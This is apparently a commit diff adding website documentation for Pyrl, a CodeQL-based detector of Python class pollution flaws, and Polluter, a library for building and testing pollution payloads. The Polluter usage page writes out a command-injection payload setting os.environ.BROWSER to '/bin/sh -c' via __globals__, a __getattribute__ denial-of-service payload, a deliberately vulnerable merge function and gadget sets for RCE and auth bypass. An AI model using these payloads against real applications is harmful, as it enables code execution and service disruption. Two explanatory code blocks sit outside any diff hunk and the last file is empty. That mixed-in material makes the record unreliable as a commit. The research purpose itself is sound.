docs(wiki): Provides documentation for Pyrl and Polluter

jackfromeast · jackfromeast · commit 02b2c5326754 · 2026-05-13T00:17:25.000-04:00
diff --git a/website/source/content/docs/tool/_index.md b/website/source/content/docs/tool/_index.md
@@ -0,0 +1,21 @@
+---
+title: "Tool"
+weight: 5
+bookCollapseSection: true
+---
+
+# Detection and Exploitation Tools
+
+This project provides two tools for working with Python class pollution vulnerabilities:
+
+## Pyrl — Detection
+
+**Pyrl** is the first automated tool for detecting class pollution vulnerabilities in real-world Python applications. It uses a novel static analysis technique called *operational taint analysis* to precisely model the "get" and "set" primitives unique to class pollution.
+
+[Learn more about Pyrl →]({{< relref "pyrl" >}})
+
+## Polluter — Exploitation & Testing
+
+**Polluter** is a Python library for testing and exploiting class pollution gadget chains. It helps security researchers and developers verify whether a class pollution vulnerability is exploitable in a specific application context.
+
+[Learn more about Polluter →]({{< relref "polluter" >}})
diff --git a/website/source/content/docs/tool/polluter/_index.md b/website/source/content/docs/tool/polluter/_index.md
@@ -0,0 +1,20 @@
+---
+title: "Polluter"
+weight: 2
+bookCollapseSection: true
+---
+
+# Polluter
+
+**Polluter** is a Python library for testing and exploiting class pollution gadget chains. It provides utilities for constructing pollution payloads, verifying exploitability, and testing gadgets against vulnerable applications.
+
+## What Polluter Does
+
+- Constructs nested dictionary payloads for class pollution attacks
+- Tests gadget chains against running applications
+- Provides a library of known gadgets for common frameworks
+- Helps security researchers verify Pyrl findings
+
+## Source Code
+
+The Polluter library is located at [`lib/polluter/`](https://github.com/jackfromeast/python-class-pollution/tree/main/lib/polluter) in the repository.
diff --git a/website/source/content/docs/tool/polluter/install.md b/website/source/content/docs/tool/polluter/install.md
@@ -0,0 +1,19 @@
+---
+title: "Installation"
+weight: 1
+---
+
+# Installing Polluter
+
+## From Source
+
+```bash
+git clone https://github.com/jackfromeast/python-class-pollution.git
+cd python-class-pollution/lib/polluter
+pip install -e .
+```
+
+## Requirements
+
+- Python 3.10+
+- No additional dependencies for the core library
diff --git a/website/source/content/docs/tool/polluter/usage.md b/website/source/content/docs/tool/polluter/usage.md
@@ -0,0 +1,78 @@
+---
+title: "Usage"
+weight: 2
+---
+
+# Using Polluter
+
+Polluter helps construct and test class pollution payloads.
+
+## Constructing Payloads
+
+```python
+from polluter import Payload
+
+# Build a DoS payload targeting __getattribute__
+payload = Payload.build(
+    path="__class__.__getattribute__",
+    value="1337"
+)
+# → {"__class__": {"__getattribute__": "1337"}}
+
+# Build an RCE payload targeting os.environ
+payload = Payload.build(
+    path="__class__.__init__.__globals__.sys.modules.os.environ.BROWSER",
+    value="/bin/sh -c 'id > /tmp/pwned'"
+)
+```
+
+## Testing Against a Vulnerable Function
+
+```python
+from polluter import test_pollution
+
+# Define the vulnerable update function
+def update(obj, data):
+    for key in data:
+        val = data[key]
+        if isinstance(val, dict):
+            update(getattr(obj, key), val)
+        else:
+            setattr(obj, key, val)
+
+# Test if pollution is achievable
+result = test_pollution(
+    target_func=update,
+    payload_path="__class__.__getattribute__",
+    payload_value="1337"
+)
+
+print(result.success)      # True/False
+print(result.consequence)  # "DoS" / "RCE" / etc.
+```
+
+## Using with the PoC Collection
+
+Each entry in the `cp-collection/` directory contains a proof-of-concept that can be run with Polluter:
+
+```bash
+cd cp-collection/django-unicorn/poc
+pip install -r requirements.txt
+python poc.py
+```
+
+## Gadget Library
+
+Polluter includes known gadget templates:
+
+```python
+from polluter.gadgets import dos, rce, xss, auth_bypass
+
+# Get all DoS gadgets
+for gadget in dos.all():
+    print(f"{gadget.name}: {gadget.path} = {gadget.value}")
+
+# Get RCE gadgets that work with Constrained-Get
+for gadget in rce.constrained():
+    print(f"{gadget.name}: {gadget.path}")
+```
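
For reference alongside `usage.md`: a minimal, self-contained sketch of how a dotted path can become the nested-dictionary payload shown in the comments above, and how the documented `update` function lets it reach a class. The helper `build_nested_payload` and the `User` class are hypothetical names for illustration only. They are not Polluter's `Payload.build` or any part of its API, which this diff does not show.

```python
from typing import Any


def build_nested_payload(path: str, value: Any) -> Any:
    """Hypothetical helper: wrap `value` in one dict level per path segment."""
    payload: Any = value
    for key in reversed(path.split(".")):
        payload = {key: payload}
    return payload


def update(obj: Any, data: dict) -> None:
    """Same recursive merge as the vulnerable function in usage.md."""
    for key, val in data.items():
        if isinstance(val, dict):
            update(getattr(obj, key), val)  # "get": walk to the next object
        else:
            setattr(obj, key, val)  # "set": write the leaf value


class User:
    role = "guest"  # class-level default shared by all instances


victim = User()
bystander = User()

payload = build_nested_payload("__class__.role", "admin")
update(victim, payload)

# The write landed on the class, so an unrelated instance is affected too.
print(payload)
print(bystander.role)
```

The payload is merged into a single instance, yet the `__class__` key redirects the write to `User` itself, which is why `bystander` observes the changed value.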
diff --git a/website/source/content/docs/tool/pyrl/_index.md b/website/source/content/docs/tool/pyrl/_index.md
@@ -0,0 +1,73 @@
+---
+title: "Pyrl"
+weight: 1
+bookCollapseSection: true
+---
+
+# Pyrl
+
+Pyrl (pronounced "Pearl") is the **first automated detection tool** for Python class pollution vulnerabilities. It uses a novel static analysis technique called *operational taint analysis* implemented on top of CodeQL.
+
+## What Pyrl Does
+
+Pyrl tracks attacker-controlled inputs through "get" and "set" primitives using fine-grained semantic taint labels:
+- **T_INPUT** — Direct attacker input
+- **T_ENUM** — Enumerable value from split operations
+- **T_KEY** — Potential key value from enumeration
+- **T_OBJ** — Object resolved through a tainted key
+- **G_ATTR** / **G_ITEM** — Access type annotations (attribute vs. item)
+
+## Key Features
+
+- Detects all **6 vulnerability types** in the taxonomy
+- Handles both first-order and second-order get operations
+- Performs **exploitability checking** (verifies both assignments in Dual-Set are in mutually exclusive branches)
+- Uses **barrier node analysis** to reduce false positives (key sanitization, type checks)
+- Scales to large codebases (analysis cost grows linearly with the number of AST nodes)
+
+## Performance
+
+- **868** total alerts across 671K+ Python projects
+- **47** confirmed true positive zero-day vulnerabilities
+- **38%** false positive rate, well below the 78-97% of baseline approaches
+- Analysis time: typically under 2 minutes per package
+
+## Architecture
+
+```
+┌──────────────────────────────────────────────────┐
+│                    Pyrl Pipeline                  │
+├──────────────────────────────────────────────────┤
+│                                                  │
+│  1. Package Download & Database Setup            │
+│     └─ CodeQL database creation                  │
+│                                                  │
+│  2. Operational Taint Analysis                   │
+│     ├─ Taint Initialization (INPUT rule)         │
+│     ├─ Taint Propagation (SPLIT, ENUMERATE,      │
+│     │   GETITEM, GETATTR, BRANCH rules)          │
+│     └─ Taint Merging (at control-flow joins)     │
+│                                                  │
+│  3. Vulnerability Detection                      │
+│     ├─ Sink identification (assignment tuples)   │
+│     ├─ Label condition checking (Table 5)        │
+│     └─ Type classification (6 types)             │
+│                                                  │
+│  4. Exploitability Checking                      │
+│     ├─ Mutual exclusion verification             │
+│     └─ Barrier node / dominator analysis         │
+│                                                  │
+│  5. Result Processing                            │
+│     └─ Report generation with taint flow paths   │
+│                                                  │
+└──────────────────────────────────────────────────┘
+```
+
+## Implementation
+
+- Written in **CodeQL** (QL language) — 3,509 lines of new code
+- Runs on CodeQL v2.21.3 with Python language support v4.0.5
+- Extended CodeQL standard library for:
+  - Collection data structures (`namedtuple`, etc.)
+  - Object attribute definition resolution
+  - Data flow through higher-order functions (`reduce`, etc.)
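
Reading aid for the taint labels listed in `pyrl/_index.md` above: a minimal sketch of a dotted-path setter, the kind of "get"/"set" pattern the page describes. The function `set_by_path`, the `Settings` class, and the label annotations in the comments are illustrative assumptions derived only from the label descriptions on that page. They are not Pyrl output and not part of its QL code.

```python
from typing import Any


def set_by_path(root: Any, path: str, value: Any) -> None:
    """Deliberately unsafe dotted-path setter (hypothetical example)."""
    # `path` and `value` come straight from the caller: direct input (T_INPUT).
    parts = path.split(".")  # result of a split operation (T_ENUM)
    obj = root
    for name in parts[:-1]:  # each element is a potential key (T_KEY)
        # "get" primitive through attribute access (G_ATTR); the result is
        # an object resolved through a tainted key (T_OBJ).
        obj = getattr(obj, name)
    # "set" primitive: caller-chosen attribute on a caller-chosen object.
    setattr(obj, parts[-1], value)


class Settings:
    debug = False


instance = Settings()
set_by_path(instance, "__class__.debug", True)

# The assignment reached the class, not just the instance.
print(Settings.debug)
```

Swapping `getattr` for `obj[name]` would make the access an item lookup, which is the distinction the G_ATTR / G_ITEM annotations are described as recording.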
diff --git a/website/source/content/docs/tool/pyrl/install.md b/website/source/content/docs/tool/pyrl/install.md
@@ -0,0 +1,83 @@
+---
+title: "Installation"
+weight: 1
+---
+
+# Installing Pyrl
+
+## Prerequisites
+
+- Python 3.10+
+- [CodeQL CLI](https://github.com/github/codeql-cli-binaries) v2.21.3 or later
+- Git
+
+## Installation Steps
+
+### 1. Clone the Repository
+
+```bash
+git clone https://github.com/jackfromeast/python-class-pollution.git
+cd python-class-pollution
+```
+
+### 2. Install Python Dependencies
+
+```bash
+# Using uv (recommended)
+uv sync
+
+# Or using pip
+pip install -e .
+```
+
+### 3. Install CodeQL CLI
+
+Download the CodeQL CLI from the [official releases](https://github.com/github/codeql-cli-binaries/releases):
+
+```bash
+# Linux (on macOS, download codeql-osx64.zip from the same release instead)
+wget https://github.com/github/codeql-cli-binaries/releases/download/v2.21.3/codeql-linux64.zip
+unzip codeql-linux64.zip
+export PATH="$PWD/codeql:$PATH"
+
+# Verify installation
+codeql version
+```
+
+### 4. Download CodeQL Libraries
+
+```bash
+# Clone the CodeQL standard libraries
+git clone https://github.com/github/codeql.git codeql-repo
+```
+
+### 5. Verify Installation
+
+```bash
+# Check Pyrl is accessible
+python -m pyrl --help
+```
+
+## Docker (Alternative)
+
+If you prefer containerized setup:
+
+```bash
+docker build -t pyrl .
+docker run --rm -v "$(pwd)/target:/target" pyrl analyze /target
+```
+
+## Troubleshooting
+
+### CodeQL version mismatch
+Pyrl requires CodeQL v2.21.3+ with Python language support v4.0.5. Check with:
+```bash
+codeql version
+codeql resolve languages  # Should show python
+```
+
+### Python version
+Pyrl requires Python 3.10+:
+```bash
+python --version  # Must be >= 3.10
+```
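
For reference alongside `pyrl/install.md`: a minimal sketch that automates the prerequisite checks listed above (Python 3.10+, CodeQL CLI v2.21.3 or later, Git). The helper names `extract_version` and `check_prerequisites` are hypothetical, and the script only assumes that `codeql version` prints a dotted `x.y.z` number somewhere in its output. It does not check the Python language support version.

```python
import re
import shutil
import subprocess
import sys

MIN_PYTHON = (3, 10)
MIN_CODEQL = (2, 21, 3)


def extract_version(text: str):
    """Return the first x.y.z found in `text` as a tuple of ints, or None."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(part) for part in match.groups()) if match else None


def check_prerequisites() -> list:
    """Collect human-readable problems; an empty list means all checks passed."""
    problems = []
    if sys.version_info[:2] < MIN_PYTHON:
        problems.append("Python 3.10+ is required")
    if shutil.which("git") is None:
        problems.append("git was not found on PATH")
    codeql = shutil.which("codeql")
    if codeql is None:
        problems.append("codeql was not found on PATH")
    else:
        result = subprocess.run(
            [codeql, "version"], capture_output=True, text=True, check=False
        )
        found = extract_version(result.stdout)
        if found is None or found < MIN_CODEQL:
            problems.append("CodeQL CLI v2.21.3 or later is required")
    return problems


if __name__ == "__main__":
    issues = check_prerequisites()
    for issue in issues:
        print(f"missing prerequisite: {issue}")
    sys.exit(1 if issues else 0)
```

Versions are compared as integer tuples rather than strings, so `2.21.10` correctly ranks above `2.21.3`.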
diff --git a/website/source/content/docs/tool/pyrl/usage.md b/website/source/content/docs/tool/pyrl/usage.md